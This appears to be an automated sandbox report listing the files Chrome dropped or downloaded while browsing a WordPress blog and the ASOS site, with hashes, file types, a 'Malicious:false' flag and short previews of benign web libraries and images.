                                                                                                                                                                                                                                                                  Preview:/*! v8.2.0, license file: uuid.LICENSE.txt */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?module.exports=e():"function"==typeof define&&define.amd?define("uuid",e):(t=t||self).uuid=e()}(this,(function(){"use strict";var t="undefined"!=typeof crypto&&crypto.getRandomValues&&crypto.getRandomValues.bind(crypto)||"undefined"!=typeof msCrypto&&"function"==typeof msCrypto.getRandomValues&&msCrypto.getRandomValues.bind(msCrypto),e=new Uint8Array(16);function o(){if(!t)throw new Error("crypto.getRandomValues() not supported. See https://github.com/uuidjs/uuid#getrandomvalues-not-supported");return t(e)}for(var n=[],r=0;r<256;++r)n.push((r+256).toString(16).substr(1));return function(t,e,r){var u=(t=t||{}).random||(t.rng||o)();if(u[6]=15&u[6]|64,u[8]=63&u[8]|128,e){r=r||0;for(var d=0;d<16;++d)e[r+d]=u[d];return e}return function(t,e){var o=e||0;return(n[t[o+0]]+n[t[o+1]]+n[t[o+2]]+n[t[o+3]]+"-"+n[t[o+4]]+n[t[o+5]]+"-"+n[t[o+6]]+n[t[o+7]]+"-"+n[t[o+8]]+n[t[o+9]]+"-"+n[t[o
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):2228
                                                                                                                                                                                                                                                                  Entropy (8bit):7.82817506159911
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:4/6MuQu6DYYEcBDlBVzqawiHI1Oupgl8m7NCnagQJFknwD:4SabhtXqMHyCl8m7N0ag6D
                                                                                                                                                                                                                                                                  MD5:EF9941290C50CD3866E2BA6B793F010D
                                                                                                                                                                                                                                                                  SHA1:4736508C795667DCEA21F8D864233031223B7832
                                                                                                                                                                                                                                                                  SHA-256:1B9EFB22C938500971AAC2B2130A475FA23684DD69E43103894968DF83145B8A
                                                                                                                                                                                                                                                                  SHA-512:A0C69C70117C5713CAF8B12F3B6E8BBB9CDAF72768E5DB9DB5831A3C37541B87613C6B020DD2F9B8760064A8C7337F175E7234BFE776EEE5E3588DC5662419D9
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...0...0.....W.......gAMA......a.... cHRM..z&..............u0...`..:....p..Q<....bKGD.......C......pHYs.................IDATh...P....=..8.....Nx. ..PlP8..;.C.1iL#6...*.Z..!......3.po .o.L.i.I..1fl..4..ujL&6$...............w...........,Z..z. ~.....\.._.C.eK...g..%..P..L7...96..q....L.....k6...*..,xz.._......B."#...L(n..f..Yb...*.8.;....K)N...H).%.F"Ic.LB.........jG.uD..B....Tm....T..).A.}D.f..3.V.....O.....t_..].x.{o......*....x?!W...j..@..G=Ed.XF.........J..E?../]..?p..W..H..d5% WA+.....)2r..+..'qk8.../HS.[...u..z.P.*....-.A.}.......I .P.....S....|...)..KS4....I.....W...@....S.s..s..$`.X9.....E.x.=.u.*iJ...........k......'...!.a....*+.....(...S..\h....@............I.$..%.2....l......a.|.....U....y.....t..8....TF.o.p.+.@<.g........-.M.....:.@..(.......@......>..=.ofm.WM{...e..,..D.r.......w....T.L.os..T@Rv..;.....9....56<.x...........2.k.1....dd.V.....m..y5../4|...G.p.V.......6...}.....B........5...&..v..yTd.6...../m.K...(.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):102
                                                                                                                                                                                                                                                                  Entropy (8bit):4.997660514702103
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3:JSbMqSL1cdXWKQKT/hlkMYatGECWaee:PLKdXNQKzLQL
                                                                                                                                                                                                                                                                  MD5:9AFB0D35BB088B3036561313BF7CE1F4
                                                                                                                                                                                                                                                                  SHA1:C7F3FDE34C537242969FBBD736B5B129611F1694
                                                                                                                                                                                                                                                                  SHA-256:6E4501CE6F65A1B8671A9D31A8F5AB56DFA4E30AA7A4A971DAA1544AB2EB53C1
                                                                                                                                                                                                                                                                  SHA-512:C08FAB7DD122743F8F942AC5F0F1A05A2A44BEFD7DA677074CC3D2D464A106CE88047C1396F4C99DABBF99541230CA37B05158F448E7014B36E1E9FE38C572AF
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:importScripts('https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js');
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 3 icons, 16x16, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):15406
                                                                                                                                                                                                                                                                  Entropy (8bit):4.853942207900639
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:Ft/psWR6+yFGfemUReAriQWT7+7VilfBV:FMq6AfetQAOQvVilZ
                                                                                                                                                                                                                                                                  MD5:5A9933E343D1DDB7ED5772E63AF4F578
                                                                                                                                                                                                                                                                  SHA1:FE6E2E9B66974F706947E8A7026CBA192559516D
                                                                                                                                                                                                                                                                  SHA-256:5B658F5A51A2CC169E3C16DC091BBBB7817D244DE0D8559CC05182DC3FDF340D
                                                                                                                                                                                                                                                                  SHA-512:77994FB84AFC76FCA806FF99670EF858A688066DC3205723752A1D5BF4E56E7494E3ABB87883F72589EBECCFD6E5EF41FFCF6DEC9224177E31CDC1570F7E67FD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://s1.wp.com/i/favicon.ico
                                                                                                                                                                                                                                                                  Preview:............ .h...6... .... .(.......00.... .h&......(....... ..... ..........................................[:5.X9..X8..Y8..Y8..X8..X9..W:5.........................U@..Y8..Y8..X8..X8..X8..X8..X8..X8..Y8..X9..N;..............b;..X9..X8..X8..u[..............uZ..Y9..X8..X9..U@..........X9..X8..[<............\<..[;..........\<..X8..Y8......[:5.Y8..Y9....q.........fH..Z:..........x....Y9..Y8..[:5.Z9..X8..w]....gJ..........~..uZ..........n....v\..X8..X9..X8..X8......iL........tZ............kO......iL......X8..X8..Y8..X8......\=..........Z:............Y9......dF......X8..Y8..Y8..X8......uZ........X8..o.........X8.......y......X8..Y8..X8..X8..............sX..X8..........eG..]>..............X8..X8..X9..X8..w]..........i..p..........w]...{..........y`..X8..X9..[:5.Y8..Y9......p..Z:..Z;..Z;..Z;..Y:..|c..........Y9..Y8..W:5.....Y8..X8..\<......hL..[;..[;..hL......\<..X8..X9..........U@..X9..X8..Y9..y`..................v\..Y9..X8..X9..b;..............b
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (8426), with no line terminators
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):8426
                                                                                                                                                                                                                                                                  Entropy (8bit):5.1292117818572525
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:192:Vq91cVg7pLtvMFO90lpyylSXV2XOlvFwXLlyjFxO/sR4KZsGdocVwh3bBitzhb:VqcVg7pLtvMFO90lpyylSXV2X2twX5Kb
                                                                                                                                                                                                                                                                  MD5:F466CB6B256973317C2315741FAD9F49
                                                                                                                                                                                                                                                                  SHA1:EA2C62047A1697C19B06BE23871CA839849CB8A3
                                                                                                                                                                                                                                                                  SHA-256:A6DC271CBDAA05E97C5144483628DF9E30B68326E5B04A5FEF3322AF1C0F22E0
                                                                                                                                                                                                                                                                  SHA-512:85DE6B5F1DF04A2D70C2E3843AEE63BF0BA46BA770FF1D26550C471B689627449AB943CF5F55C8123B0D7A6BA390C336308865116C7A907DEF2494FCBC853D57
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:(function(){const e=window.wpcom||{};e.actionbar={};e.actionbar.data=window.actionbardata;const t=e.actionbar.data;function n(e={},n=()=>{}){if(!e.action){return}fetch(t.xhrURL,{method:"POST",body:new URLSearchParams(e),headers:{"Content-Type":"application/x-www-form-urlencoded; charset=UTF-8","X-Requested-With":"XMLHttpRequest"}}).then(n)}let o;function c(){if(!o){o=new Promise((e,n)=>{if(window.WPCOM_Proxy_Request){e(window.WPCOM_Proxy_Request)}else{const o=document.createElement("script");o.src=t.proxyScriptUrl;o.async=true;document.body.appendChild(o);o.addEventListener("load",()=>e(window.WPCOM_Proxy_Request));o.addEventListener("error",e=>n(e))}})}return o}function s(e,t,n={}){const o={path:e,body:n,method:"POST",apiNamespace:t};c().then(e=>e(o))}function i(e,t){n({action:"actionbar_stats",stat:e},t)}function r(e){n({action:e,_wpnonce:t.nonce,source:"actionbar",blog_id:t.siteID})}let a=window.scrollY||window.pageYOffset||0;if(window!=window.top){return}const l=document.querySelec
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):5539
                                                                                                                                                                                                                                                                  Entropy (8bit):7.357311566548232
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:+Oj69N26MT0D5MdtbZPAVwzV2avPcX1pstneT9vWk1+F:+OGsYNMtKwYavPCpgneT9v+F
                                                                                                                                                                                                                                                                  MD5:997C0163BA5D492D965BE6BD688714BE
                                                                                                                                                                                                                                                                  SHA1:7361B713644EF63DAF61805994E7EA640113F4BF
                                                                                                                                                                                                                                                                  SHA-256:896ECBCDDA0C1FFFEA4DEB19CCD4FB06C76B63A55F4A76F2D87C29801FC421BC
                                                                                                                                                                                                                                                                  SHA-512:2AF66579B503413F3B9B51423BE16A7A5DD7ED4583CD7DB0E3C850E0C8CD3C7959EE6D001684199EB344EC426B5BDB0F590D1265D0300CB937DA4594A3AE7243
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://images.asos-media.com/navigation/visa-electron-png
                                                                                                                                                                                                                                                                  Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (30280)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):352608
                                                                                                                                                                                                                                                                  Entropy (8bit):5.582187247776883
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:3072:TRwiztG3ETxaloby0R5CptDY8/I8+yr/OUYhcDmKD0C8Gp/1WV:TNG3gslo5M/GUTx0C8Gp/1S
                                                                                                                                                                                                                                                                  MD5:D359D8FF5F26602E391CBD51847CFF79
                                                                                                                                                                                                                                                                  SHA1:7B28373CF3F1074A93C059C176ED58491AC1B11B
                                                                                                                                                                                                                                                                  SHA-256:C6D5DD0A71DA4D84B4F140DD215D16053F628E75B4E897838D2BEE77F1BE75C1
                                                                                                                                                                                                                                                                  SHA-512:3B8E68006A4242252AE0812068E00293254FC0E2F22473D4189DBE744E0FB85EB01316C6E2A646E9A7DC8DB89E663AD04C529B064E4CB12C9E0239BAA320FE2F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"104",. . "macros":[{"function":"__e"},{"function":"__v","vtp_name":"gtm.triggers","vtp_dataLayerVersion":2,"vtp_setDefaultValue":true,"vtp_defaultValue":""},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"customerData.hashedEmail"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"capiEventId"},{"function":"__k","vtp_decodeCookie":false,"vtp_name":"ScCid"},{"function":"__v","convert_case_to":1,"vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"customerData.hashedPhoneNumber"},{"function":"__c","vtp_value":"2dbac57a-c840-44ce-b498-eafd3b06a3c3"},{"function":"__u","vtp_enableMultiQueryKeys":false,"vtp_enableIgnoreEmptyQueryParam":false},{"function":"__cid"},{"function":"__v","vt
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (13624)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):13698
                                                                                                                                                                                                                                                                  Entropy (8bit):5.697522364571399
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:4b7/DYQA8tvbSaFcaL+aHw72F1gW0+G3mxhvFKF/X9FiDHhoMEqCDcrIFmtjW8v4:4b7MQA+vbSaFcaL/HwiF1gW0+G3mxhvg
                                                                                                                                                                                                                                                                  MD5:F9E9660E67C43524C5D32FEFB17A1656
                                                                                                                                                                                                                                                                  SHA1:B5188C897C0B0D4EA1321976207664CD6A20FCDC
                                                                                                                                                                                                                                                                  SHA-256:C89CACD0C31BEFF5767916DCFB82E606A53BF9586B2F95F5112EBE0304DADEF0
                                                                                                                                                                                                                                                                  SHA-512:52BF9A0AE230A02DE3B8161F3AA692CA68E54D74B64FB16645CE05EBC19B99D29E88089D30C5267E927305CCA5A1DF524AD7518CCBEC74BFA1A2F77BEA19959D
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:"use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([[542],{52984:(e,n,o)=>{o.d(n,{Z:()=>t});const t={container:"ojIeyOc",list:"aR_DfXn",listItem:"F28iPnp ZHWKoMf leavesden3"}},7593:(e,n,o)=>{o.d(n,{Z:()=>t});const t={burger:"btUA6FL",icon:"BKBoO9a TYb4J9A c_IO2I_",burger__hidden:"GsizLQo"}},43110:(e,n,o)=>{o.d(n,{Z:()=>t});const t={button:"qQoHatg sY3mB1c london3-button",button__isPrimary:"UNPPQ3g",button__isSecondary:"hgH_Y9G",button__isTertiary:"_5yfajiU",button__isGreen:"mZPCs_0",button__hasInvertedSize:"z1gXcCj",button__isFullWidth:"rN8Tw8V",content:"IoxIrTY",content__isHidden:"lAtN7Wf",content__truncateText:"ISgGBrx"}},33529:(e,n,o)=>{o.d(n,{Z:()=>t});const t={countryFlag:"Oqkee2R"}},89356:(e,n,o)=>{o.d(n,{Z:()=>t});const t={backdrop:"Y7dVLVI"}},6490:(e,n,o)=>{o.d(n,{Z:()=>t});const t={wrapper:"rcApLkp",container:"o1eR0Yj",container__notLoading:"nxpLsV7",container__withError:"hGhvjVU"}},90869:(e,n,o)=>{o.d(n,{Z:()=>t});const t={inheritDisplay:"d7H1qqN",progres
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):4084
                                                                                                                                                                                                                                                                  Entropy (8bit):7.0061990581924185
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:+dYj6lvHFflsXlf/lulel4wlwx+6MjnNsvIYWiR5QkyTJbZPHXZ9u6gbVwyKzJgK:+OjE9N26MT0D5MdtbZPAVwzV2dgcgl
                                                                                                                                                                                                                                                                  MD5:FEC42AB01608DDE656A0B02DF2F347F5
                                                                                                                                                                                                                                                                  SHA1:4E9B70BC18E242D6CD30C8E5AC24DC677560733B
                                                                                                                                                                                                                                                                  SHA-256:536ED0FDEF8C9E54090F06F9C4DDE73711707C744D2BD17DC68CE4C641E269C4
                                                                                                                                                                                                                                                                  SHA-512:63F83AEF3E1D3237EF56DD6BAFB3937487ABB3613F0ED361C1BCD3CD84E3001D7FD1FA07B288016777CE3CA8BCA17DD9572711CB57A76C19ACA3354B2132B84B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://images.asos-media.com/navigation/visa-png
                                                                                                                                                                                                                                                                  Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............c.................Y...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:XML 1.0 document, ASCII text
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):1366
                                                                                                                                                                                                                                                                  Entropy (8bit):5.146141325259668
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:24:2dxatPnmWC03H8WbVQnF1k4sunfF8n60yZgcyORPWegPjxULC8/8K9K4:ccpg4H7inFXfF8yZgxKOtrxUG8kK9K4
                                                                                                                                                                                                                                                                  MD5:B1E850085FA300C6C747E6670F4A570E
                                                                                                                                                                                                                                                                  SHA1:A7D7ED46EC649135325C82ED5D9CF4154363E134
                                                                                                                                                                                                                                                                  SHA-256:E98129F4ED197201F61E32E87742CABF792A4D2A50A9A17131CAEC6FCA30EA1D
                                                                                                                                                                                                                                                                  SHA-512:F94BD9D53A226CEE3244C0144A55991EA8031C211A18B0CCDD64677FD8AFF64598F1839999DB0E10889EBF63AEE6D878C359B55D497836DB806CD0C48355704F
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://dartergary.wordpress.com/osd.xml
                                                                                                                                                                                                                                                                  Preview:<?xml version="1.0" encoding="UTF-8" ?>.<OpenSearchDescription xmlns="http://a9.com/-/spec/opensearch/1.1/" xmlns:moz="http://www.mozilla.org/2006/browser/search/">..<ShortName>Site Title</ShortName>..<Description>Search Site Title - </Description>..<Contact>help@wordpress.com</Contact>..<Url type="application/atom+xml" template="https://dartergary.wordpress.com/?s={searchTerms}&amp;feed=atom" />..<Url type="rss+xml" template="https://dartergary.wordpress.com/?s={searchTerms}&amp;feed=rss2" />..<Url type="text/html" template="https://dartergary.wordpress.com/?s={searchTerms}" method="GET" />..<Url type="application/opensearchdescription+xml" rel="self" template="https://dartergary.wordpress.com/osd.xml" />..<LongName>Site Title</LongName>..<Image height="16" width="16" type="image/vnd.microsoft.icon">https://dartergary.wordpress.com/favicon.ico</Image>..<Image height="64" width="64" type="image/png">https://s-ssl.wordpress.com/i/logo/gray-white-transparent-64.png</Image>..<Query role="
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 80 x 80, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):2231
                                                                                                                                                                                                                                                                  Entropy (8bit):7.877156371855539
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:48:NmntJOd/sFwn+HuC+qdNnP3hNuGBsihbtiRr/jsjD4FnXV6oHSSYxI3u:8E/0iC+8nPvScsRr7MsdSSYxI3u
                                                                                                                                                                                                                                                                  MD5:3DB9E52F0236368C12A29D95BC940531
                                                                                                                                                                                                                                                                  SHA1:DEA098ED21582C63B8828A7EA8201F946843F6EC
                                                                                                                                                                                                                                                                  SHA-256:C13E7E8FC0A40CDBFD2FE608AC748EF21CB6DEFFFABBB61F80BDC90AC4492096
                                                                                                                                                                                                                                                                  SHA-512:8EFB65F053679C960CD8A34F46B53D8F113F251F920DC82F5D40779A65C91E5D245A3F6824A1AF0F9351E90D95AD3218E72C8348D40D28CCCD67FA7492F036DD
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://assets.asosservices.com/storesa/images/flags/de.png
                                                                                                                                                                                                                                                                  Preview:.PNG........IHDR...P...P............sRGB........qIDATx...o.E....8.=.I/i.."."..@QT..(.U.+U...*!....x...\!A..R.Q$....(i.&i.I..I.;..^.o.q7N|....9........|fg....4p...=.m.t.A9I>..rz.C.~.'..r..n.,.....c.}....Y...6...%#.t..:.2+..IE.h.m....-.Nl..'...;.,..6.....`.~.:...,C_.'.m_.9..$.n..-..}.w..=..5.c....zp.P<..Y*"x.C...=.+.|.Ut.X......qk...+..~...+....&w...a.l.Q..k...a..?l..;".vJ.......x>.......`.D.P.4a$.Ju...2;_...j...a{^r...uH....mI'_U.;.L@r-..mm..io.+.\.EN..E...z...8..MJ....L6..U.L....).u&.no..w..}?fm.PK...3.8......x..$<Ag..l.(!F.Dz.....&..z.....~#.uf...Y8...id...-....0.......'w@$1..)r.....@b....@.+...7.v,S..2\d.A.......3T.......iN;......]<.l....,.p....8%.8.4...`.{..Eu..q.Ls.,...3u..5.)v.h*..f......N.P...4J.{.._)....X..............T..S...._.LC=.LA@...q.."M..*2S\#....+.Syk....~24R.I....(i.0Vn....+.S#._...\.......i....u.7)..V:.rf...?b....l..X.T.:.h.W.z$X..j"E.@D\.dG@..;...s.,.......hV...?...t.......F../..J......yG2.:....=.`...>.Q@m..2....NeX......Nm.G/y,.
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ISO Media, AVIF Image
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):4242
                                                                                                                                                                                                                                                                  Entropy (8bit):7.054321919932169
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:96:+OjX9N26MT0D5MdtbZPAVwzV23mHQTu0NuOuH:+OLsYNMtKwYxTEXH
                                                                                                                                                                                                                                                                  MD5:87CD5A0B5671A7A31D9BD4A8DD749A97
                                                                                                                                                                                                                                                                  SHA1:6A383A1E0C6A2FF180EFAF6625BF8A7745EA4B84
                                                                                                                                                                                                                                                                  SHA-256:97C39E4304E9B5F179D0AB70FF17AD769F1E1B380065652622B6A0255DE5034E
                                                                                                                                                                                                                                                                  SHA-512:A954E0D209752C87A9118A7201F32FDD52716A95C6A76ABB9BDDE8FD6C1CF4BCD15C63AACEDEE769EF0B6714229B6A36F18BE725BB60669D38F1DC48C72A12F6
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://images.asos-media.com/navigation/mastercard-png
                                                                                                                                                                                                                                                                  Preview:... ftypavif....avifmif1miafMA1A....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D............g...+.............]...Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......`...<....pixi............av1C. .....Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (17577)
                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                  Size (bytes):17672
                                                                                                                                                                                                                                                                  Entropy (8bit):5.210199101660777
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:384:iwvGdN1cMU8QatLePlko998Vp3AIgujHrEDO11yy1plMW2IP4VldNr1:ZGSMU8qPlko998PQIg0HrEDM1yy1plRE
                                                                                                                                                                                                                                                                  MD5:34F15782047F9D678A947BF675E8A3D8
                                                                                                                                                                                                                                                                  SHA1:6034D6A3106350EEC176759ECF57C7E8551ADF3F
                                                                                                                                                                                                                                                                  SHA-256:0C8A9732467A1684679DE0BB5A979468FC31123212AC1F936F7F2CC653E90B29
                                                                                                                                                                                                                                                                  SHA-512:27DEACE81F42CA5B0EDE5A0EFB534D17B86A51730E6C8776B148CBD5759A5FAE158B6CDE1F04F373B5ED2BC7BCAACF17369BDD302D47F112ADBD5755CC58165B
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  Preview:/*! v2.2.0, license file: require.LICENSE.txt */.var requirejs,require,define;!function(global){var req,s,head,baseElement,dataMain,src,interactiveScript,currentlyAddingScript,mainScript,subPath,version="2.2.0",commentRegExp=/(\/\*([\s\S]*?)\*\/|([^:]|^)\/\/(.*)$)/gm,cjsRequireRegExp=/[^.]\s*require\s*\(\s*["']([^'"\s]+)["']\s*\)/g,jsSuffixRegExp=/\.js$/,currDirRegExp=/^\.\//,op=Object.prototype,ostring=op.toString,hasOwn=op.hasOwnProperty,isBrowser=!("undefined"==typeof window||"undefined"==typeof navigator||!window.document),isWebWorker=!isBrowser&&"undefined"!=typeof importScripts,readyRegExp=isBrowser&&"PLAYSTATION 3"===navigator.platform?/^complete$/:/^(complete|loaded)$/,defContextName="_",isOpera="undefined"!=typeof opera&&"[object Opera]"===opera.toString(),contexts={},cfg={},globalDefQueue=[],useInteractive=!1;function commentReplace(e,t,i,r){return r||""}function isFunction(e){return"[object Function]"===ostring.call(e)}function isArray(e){return"[object Array]"===ostring.cal
                                                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                  File Type:PNG image data, 48 x 48, 8-bit gray+alpha, non-interlaced
                                                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                                                  Size (bytes):665
                                                                                                                                                                                                                                                                  Entropy (8bit):7.42832670119013
                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                  SSDEEP:12:6v/7OEUelyuRs56fyKgIEInu5VLJBZInmJhd/3VqQXD8GBm1:belFRs56fuIEIu5VNBZInMTICfBO
                                                                                                                                                                                                                                                                  MD5:07BF314AAB04047B9E9A959EE6F63DA3
                                                                                                                                                                                                                                                                  SHA1:17BEF6602672E2FD9956381E01356245144003E5
                                                                                                                                                                                                                                                                  SHA-256:55EAF62CB05DA20088DC12B39D7D254D046CB1FD61DDF3AE641F1439EFD0A5EE
                                                                                                                                                                                                                                                                  SHA-512:2A1D4EBC7FBA6951881FD1DDA745480B504E14E3ADAC3B27EC5CF4045DE14FF030D45DDA99DC056285C7980446BA0FC37F489B7534BE46107B21BD43CEE87BA0
                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                                                  URL:https://www.gstatic.com/recaptcha/api2/info_2x.png
